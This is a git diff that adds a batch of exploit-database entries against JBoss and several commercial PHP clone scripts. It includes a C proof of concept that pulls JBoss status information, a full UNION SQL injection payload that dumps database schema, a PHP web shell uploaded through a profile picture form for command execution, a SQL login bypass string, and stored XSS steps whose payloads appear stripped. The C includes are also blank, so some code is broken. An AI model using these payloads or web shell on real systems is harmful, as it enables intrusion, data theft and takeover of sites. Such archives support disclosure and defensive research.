diff --git a/exploits/multiple/remote/44009.c b/exploits/multiple/remote/44009.c
new file mode 100644
index 000000000..95f1affb4
--- /dev/null
+++ b/exploits/multiple/remote/44009.c
@@ -0,0 +1,85 @@
+# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
+# Date: 02/08/2018
+# Exploit Author: JameelNabbo
+# Vendor Homepage: http://www.jboss.org
+# Software Link: http://jbossas.jboss.org/downloads
+# Version: 4.2X. & 4.3.X
+# Tested on: Linux Ubuntu
+# CVE : CVE-2010-1429
+
+
+
+
+1. Description
+
+By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
+Example: http://127.0.01/status?full=true
+
+
+2. Proof of Concept
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+int socket_connect(char *host, in_port_t port){
+ struct hostent *hp;
+ struct sockaddr_in addr;
+ int on = 1, sock;
+
+ if((hp = gethostbyname(host)) == NULL){
+ herror("gethostbyname");
+ exit(1);
+ }
+ bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
+ addr.sin_port = htons(port);
+ addr.sin_family = AF_INET;
+ sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+ setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
+
+ if(sock == -1){
+ perror("setsockopt");
+ exit(1);
+ }
+
+ if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
+ perror("connect");
+ exit(1);
+
+ }
+ return sock;
+}
+
+#define BUFFER_SIZE 1024
+
+int main(int argc, char *argv[]){
+ int fd;
+ char buffer[BUFFER_SIZE];
+
+ if(argc < 3){
+ fprintf(stderr, "Usage: %s \n", argv[0]);
+ exit(1);
+ }
+
+ fd = socket_connect(argv[1], atoi(argv[2]));
+ write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
+ while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
+ fprintf(stderr, "%s", buffer);
+ }
+
+ shutdown(fd, SHUT_RDWR);
+ close(fd);
+ return 0;
+}
+
+
+3. Solution :
+Update to version 4.2.3 or later
\ No newline at end of file
diff --git a/exploits/php/webapps/44008.txt b/exploits/php/webapps/44008.txt
new file mode 100644
index 000000000..19a2e7caf
--- /dev/null
+++ b/exploits/php/webapps/44008.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection
+# Dork: N/A
+# Date: 2018-02-08
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/
+# Version: 3.0.3
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLi:
+
+#
+http://localhost/jobsite-advanced/searchresult.php?searchindus&indus=[SQL]
+
+# Parameter : indus (GET)
+# Type: UNION QUERY
+# Title: Generic UNION query (NULL) - 51 columns
+# payload : UNION SELECT
+NULL,NULL,NULL,/*!00000Concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,NULL,NULL,NULL,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*!00000from*/ information_schema.columns where table_schema=database()%23
\ No newline at end of file
diff --git a/exploits/php/webapps/44010.txt b/exploits/php/webapps/44010.txt
new file mode 100644
index 000000000..17f45a485
--- /dev/null
+++ b/exploits/php/webapps/44010.txt
@@ -0,0 +1,19 @@
+######################################################################################
+# Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.5
+# Tested on: Linux Mint
+# CVE: CVE-2018-6858
+#######################################################################################
+
+Proof of Concept
+=================
+1. Login as a user
+2. Goto "Comment" option of any post
+3. Put "" as comment
+4. You will be having a popup "PKP"
\ No newline at end of file
diff --git a/exploits/php/webapps/44011.txt b/exploits/php/webapps/44011.txt
new file mode 100644
index 000000000..34b8e6e01
--- /dev/null
+++ b/exploits/php/webapps/44011.txt
@@ -0,0 +1,22 @@
+#################################################################################################################
+# Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 2.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6860
+##################################################################################################################
+
+Proof of Concept
+=================
+1. Login as Student/Parent
+2. Go to "Edit Profile" to upload profile picture.
+3. Once you find upload section, upload following code as a PHP file:
+ "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }
+ ?>
+4. Try to access given PHP file : [site.com]/malicious.php?cmd=ls
\ No newline at end of file
diff --git a/exploits/php/webapps/44012.txt b/exploits/php/webapps/44012.txt
new file mode 100644
index 000000000..ab01a6333
--- /dev/null
+++ b/exploits/php/webapps/44012.txt
@@ -0,0 +1,19 @@
+#################################################################################################################
+# Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6861
+##################################################################################################################
+
+*Proof of Concept*
+
+1. Login into site
+2. Goto "Edit Profile"
+3. Put "" in any field
+4. You will be having a popup "PKP"
\ No newline at end of file
diff --git a/exploits/php/webapps/44013.txt b/exploits/php/webapps/44013.txt
new file mode 100644
index 000000000..7fa27cf12
--- /dev/null
+++ b/exploits/php/webapps/44013.txt
@@ -0,0 +1,19 @@
+########################################################################
+# Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 1.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6862
+##########################################################################
+
+*Proof of Concept*
+
+1. Login into the site
+2. Goto "Edit Profile"
+3. Put "" in any field
+4. You will be having a popup "PKP"
\ No newline at end of file
diff --git a/exploits/php/webapps/44014.txt b/exploits/php/webapps/44014.txt
new file mode 100644
index 000000000..fae66b91a
--- /dev/null
+++ b/exploits/php/webapps/44014.txt
@@ -0,0 +1,18 @@
+######################################################################################
+# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 2.0.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6863
+#######################################################################################
+
+Proof of Concept
+
+1. Goto login page
+2. put [admin' OR '1' = '1] as user and password field
+3. You will be logged in as an authenticated user
\ No newline at end of file
diff --git a/exploits/php/webapps/44015.txt b/exploits/php/webapps/44015.txt
new file mode 100644
index 000000000..34203e302
--- /dev/null
+++ b/exploits/php/webapps/44015.txt
@@ -0,0 +1,20 @@
+#################################################################################################################
+# Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS
+# Date: 07.02.2018
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link:
+https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
+# Category: Web Application
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Version: 4.7.2
+# Tested on: Linux Mint
+# CVE: CVE-2018-6864
+##################################################################################################################
+
+*Proof of Concept*
+
+1. Login into site
+2. Goto "Edit Profile"
+3. Put "" in any field
+4. You will be having a popup "PKP"
\ No newline at end of file
diff --git a/exploits/php/webapps/44016.txt b/exploits/php/webapps/44016.txt
new file mode 100644
index 000000000..f2b0ab5f3
--- /dev/null
+++ b/exploits/php/webapps/44016.txt
@@ -0,0 +1,28 @@
+######################################################################################
+# Exploit Title: Multi Language Olx Clone Script - Stored XSS
+# Date: 08.02.2018
+# Exploit Author: Varun Bagaria
+# Web:
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/olx-clone/
+# Category: Web Application
+# Version:2.0.6
+# Tested on: Windows 7
+# CVE: NA
+#######################################################################################
+
+Proof of Concept
+=================
+URL: https://www.phpscriptsmall.com/product/olx-clone/
+Attack Vector : Comment
+Payload :